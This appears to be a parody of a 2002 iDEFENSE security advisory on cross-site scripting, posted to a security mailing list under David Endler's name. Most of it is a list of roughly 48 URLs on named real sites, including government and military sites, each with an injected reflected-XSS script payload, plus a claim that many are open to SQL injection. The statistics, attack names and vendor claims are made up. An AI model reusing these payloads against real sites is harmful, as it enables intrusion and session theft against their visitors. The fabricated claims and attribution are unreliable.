[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200210210445.g9L4jIG07833@netsys.com>
From: dendler at idefense.com (David Endler)
Subject: iDEFENSE Security Advisory 10.21.02: Cross-Site Scripting Holes present in virtually all websites
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 10.21.02:
http://www.idefense.com/advisory/10.21.02.txt
i. Cross-Site Scripting Holes present in virtually all websites/web-services.
ii. Fully-Automated XSS-exploiting AI anti-semite terrorist robots found in the wild.
Release Date : October 21, 2002
I. BACKGROUND
Cross-Site Scripting (hereafter referred to psuedo-acronymously as XSS) is a method of host and network intrusion pioneered by network security luminaries such as ZENOMORPH (zeno@...security.net) and iDEFENSE's own DAVIDENDLER (dendler@...fense.com). It is considered one of the top 10 threats to Internet and National Security and has resulted in numerous CERT, NIPC, FBI and SANS alerts. A XSS FAQ (authored by said luminaries) is available at http://www.cgisecurity.com/articles/xss-faq.shtml.
David Endler (known in Blackhat circles as urlmazter[BoW/h4g1s/ac1db1tch3z/TMD/RaZoR]) writes the following on the subject of XSS:
"It seems today that Cross-Site Scripting (XSS) holes in popular web applications are being discovered and disclosed at an ever-increasing rate. Just glancing at the Bugtraq security mailing list archives over the first half of 2002 shows countless postings of XSS holes in widely used websites and applications. This new iDEFENSE Labs XSS paper predicts that fully and semi- automated techniques will aggressively begin to emerge for targeting and hijacking web applications using XSS, thus eliminating the need for active human exploitation. Some of these techniques are detailed along with solutions and workarounds for web application developers and users. It is available at http://www.idefense.com/XSS.html for download.
II. DESCRIPTION
iDEFENSE has determined that 98% of websites, especially those utilizing "scripts" or "active content", contain at least one passing-unfiltered-user-input-back-to-the-user-inside-html-page vulnerability that could lead to denial-of-service attacks against legitimate users, cookie and session theft, arbitrary html execution, malicious GIF/TIF injection, erroneous counter statistics, cross-frame spoofing (see idefense.com for details), crossed-bean java infection (see idefense.com for details), cross-img-src 1x1pixel web-bug injection and spoofing (see idefense.com for details), web-application muscle and nerve exhaustion attacks, and inappropriate or stalled/delayed fullscreen-pop-under banner-advertisement serving to opt-in users.
In addition to the above discovery, it was noted that many search engines (hereafter referred to as "search engines") allow for rapid identification of potentially vulnerable sites. Coupled with widespread availability of email and newsgroup discussion services on the Internet, the dissemination of information regarding potential vulnerable servers is highly expediated. This allows the hacker community (hereafter referred to as 'skiddiotards') to broadcast their findings to their peers, which results in obscure domains and servers being targetted by large numbers of neophyte skiddiotards in a very short period of time.
III. IMPACT
The impact of an XSS attack should not be underestimated. It has been discovered that close to 90% of all identified XSS vulnerabilities allow an attacker to execute arbitrary HTML (and Javascript) code with the same privileges as a standard website. Put simply, an attacker taking advantage of a XSS-vulnerability can force unsuspecting users to display and/or execute webpages that they had not previously requested. This is equivalent to creating a malicious website, and enticing users to visit the page with an appropriate HTML browser client, or attaching said malicious HTML to an email message.
Technical Note 1: Many website operators rely on cookies and session ID's to identify and track their users.
IIIII. SOLUTION
Appropriate Anti-XSS Defense Mechanisms (ADMs) should be included in your organizational security policy. The iDEFENSE Site Security Standards Charter 2002 (iSSSC02) recommends a 2-layered approach encompassing both a technical and operational component to ensure maximum transparency and pro-activity. iDEFENSE is the worlds premier supplier of Anti-XSS defense software and consultancy services. For your free XSS Vulnerability Assessment Quote (iDEFXVAQ), please contact our sales, marketing and merchandising department at the number(s) listed below.
III. EXAMPLES
The following sites and services have been found to be vulnerable to at least 1 (One) XSS (cross-site-scripting) vulnerability which may or may not lead to arbitrary webpage injection to website visitors, and stuff.
http://www.thecanadianteacher.com/cgi-bin/links/error.cgi?ID=483&title=</title><script>alert("iDEFENSE.COM");</script>
http://www.sinotrade.com.tw/ec/mo/show.asp?title=</title><script>alert("iDEFENSE.COM");</script>
http://internetwoordenboek.kennisnet.nl/inetwdb/show.asp?qu=<script>alert("iDEFENSE.COM");</script>
http://www.agnosia.com/html/albums-show.asp?cd=PappaResolution&title=<script>alert("iDEFENSE.COM");</script>
http://www.atsic.gov.au/tools/links_list.asp?Category=<script>alert("iDEFENSE.COM");</script>
http://www.cheshire.gov.uk/AtoZ/azdetails.asp?TextId=88&Title=<script>alert("iDEFENSE.COM");</script>
http://www.elearningpost.com/elthemes/addcomments.asp?theme=govlearn&title=<script>alert("iDEFENSE.COM");</script>
http://www.audit-commission.gov.uk/aboutus/what-london.asp?title=<script>alert("iDEFENSE.COM");</script>
http://www.parcomp-inc.com/mpages/x_SAV19Y5XY.asp?title="><script>alert("iDEFENSE.COM");</script>
http://home.nauticom.net/main%20subs/about.asp?title=</title><script>alert("iDEFENSE.COM");</script>
http://www.uch.edu/content/aboutus/content.asp?index=AboutUsDocs&title=<script>alert("iDEFENSE.COM");</script>
http://www.info4local.gov.uk/singleLink.asp?linkId=1594&heading=<script>alert("iDEFENSE.COM");</script>
http://www.goarticles.com/cgi-bin/search.cgi?c=52&title=<script>alert("iDEFENSE.COM");</script>
http://www.b2bautosalvage.com/oldrep/exch_1031.cfm?inv_id=<script>alert("iDEFENSE.COM");</script>&inv_id_2=1
http://tcc.comptia.org/certification_detail.cfm?CERTIFICATIONID='hacker'&TITLE=<script>alert("iDEFENSE.COM");</script>
http://form-engine.com/help.asp?chapter=FAQ&title=<script>alert("iDEFENSE.COM");</script>
http://www.apcity.org/en_apcity/en_soluti/en_soluti_4.jsp?Title=<script>alert("iDEFENSE.COM");</script>
http://www.sergey.com/cgi-bin/get.cgi?show=l_sec&title=hi</title><script>alert("iDEFENSE.COM")</script>
http://www.trabucocanyon.com/local_Contacts.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://www.biola.edu/admissions/actions/process_favorites.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://laissezfairebooks.com/search-results.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://cybrary.uwinnipeg.ca/resources/e-journals/Action-2.cfm?Title=<script>alert("iDEFENSE.COM")</script>
http://www.geocrawler.com/mail/thread.php3?subject=</title><script>alert(document.body);</script>
http://www.iww.uni-karlsruhe.de/cgi-bin/webmail?to=izv4&subject="><script>alert("iDEFENSE.COM")</script>
http://www.touchv.com/cgi-bin/webmail.cgi?to="><script>alert("iDEFENSE.COM")</script>
http://www.nibbleguru.com/cgi-bin/refer.cgi?ID=97&title=</title><script>alert("iDEFENSE.COM")</script>
http://www.findwebspace.com/glossary/glossary.asp?text=<script>alert("iDEFENSE.COM")</script>
http://www.worldsmine.com/cgi-bin/search.cgi?keywords=<script>alert("iDEFENSE.COM")</script>
http://www.cast.org/teachingeverystudent/ideas/print.cfm?name=<script>alert("iDEFENSE.COM")</script>
http://nas.nawcad.navy.mil/qol/mwr/text/index.cfm?page=<script>alert("iDEFENSE.COM")</script>
http://www.delphipages.com/resume/resume.cfm?ID=300<script>alert("iDEFENSE.COM")</script>
http://www.jerkoftheweek.com/archivetemplate.cfm?date=<script>alert("iDEFENSE.COM")</script>
http://www.collegefortexans.com/cfbin/tofa2.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.chickenchow.com/product.cfm?id=106'<script>alert("iDEFENSE.COM")</script>
http://www.cyberforum.com.br/forum-section.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.horsesmidwest.com/photoad_detail.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.cecer.army.mil/td/tips/product/details.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.swt.usace.army.mil/~news/NewsDetail.CFM?ID=188<script>alert("iDEFENSE.COM")</script>
https://www.afml.ft-detrick.af.mil/afmlo/FAQ/FAQ_Detail.cfm?ID=11<script>alert("iDEFENSE.COM")</script>
http://www.navylearning.navy.mil/help/index.cfm?KEYPAGE=VIEWHELP&ID=<script>alert("iDEFENSE.COM")</script>
http://www.norva.navy.mil/navosh/course3fy02.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.vis-security.com/projects/sec-projects.cfm?catid=2<script>alert("iDEFENSE.COM")</script>
http://www.happyflying.com/print_story.cfm?ID=15<script>alert("iDEFENSE.COM")</script>
http://www.greenbackedheron.com/id.cfm?setid=<script>alert("iDEFENSE.COM")</script>
http://www.sexualhealth.com/questions/read.cfm?ID=69<script>alert("iDEFENSE.COM");</script>
http://www.pga.com/Newsline/Tour_News/tournews_detail.cfm?ID=9755<script>alert("iDEFENSE.COM")</script>
http://www.screensaver.com/ScreensaverLibrary.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://btob.barnesandnoble.com/btbrecommended.asp?title=<script>alert("iDEFENSE.COM");</script>&CATID=96&sourceid=0039357117&btob=Y
Technical Note 2: all of these vulnerable sites were found using www.alltheweb.com "search inside URL" advanced "search engine" feature. Only by blocking access to such "search engine" features can a site administrator reduce the number of potential XSS attacks originating from his or her domain.
Technical Note 3: almost all the .cfm boxes listed above are also vulnerable to SQL injection. This was not tested by iDEFENSE as some of these servers are in the .mil TLD-domain and SQL injection probes could be interpreted as an act of war.
IIII. CREDIT
iDEFENSE wishes to thank the following people for their contributions to this advisory and to the study of XSS attack and defence methods:
Zeno Morph (zeno@...security.net)
Michael Sutton (msutton@...fense.com)
Jeremiah Grossman (jeremiah@...tehatsec.com)
Lex Arquette (lex@...tehatsec.com)
Ulf Harnhammar (ulfh@...ate.uu.se)
IVI. SOLUTION
Please visit the following websites for more information on cross-site-scripting (XSS) and computor security:
"Cross-site scripting tears holes in Net security"
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm
Article on XSS holes
http://www.perl.com/pub/a/2002/02/20/css.html
"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"
http://www.cert.org/advisories/CA-2000-02.html
Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
http://www.cert.org/tech_tips/cgi_metacharacters.html
Paper on Microsoft's Passport System
http://eyeonsecurity.net/papers/passporthijack.html
Paper on Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies
The webappsec mailing list (Visit www.securityfocus for details)
webappsec@...urityfocus.com
!!!!!!!!!!!!!! Get paid for security research !!!!!!!!!!!11
http://www.idefense.com/contributor.html
!!!!!!!!!!!!!! Subscribe to iDEFENSE Advisories: !!!!!!!11
send email to listserv@...fense.com, subject line: "subscribe"
- -dave
David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@...fense.com
www.idefense.com
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A
iQA/AwUBPZnxEErdNYRLCswqEQLrkACdHdU6cpv+NEzsJPi4ZZQxe2iy2NkAoKn0
ddyu8Js8PWZ/LMCNh+hYejfz
=CEof
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists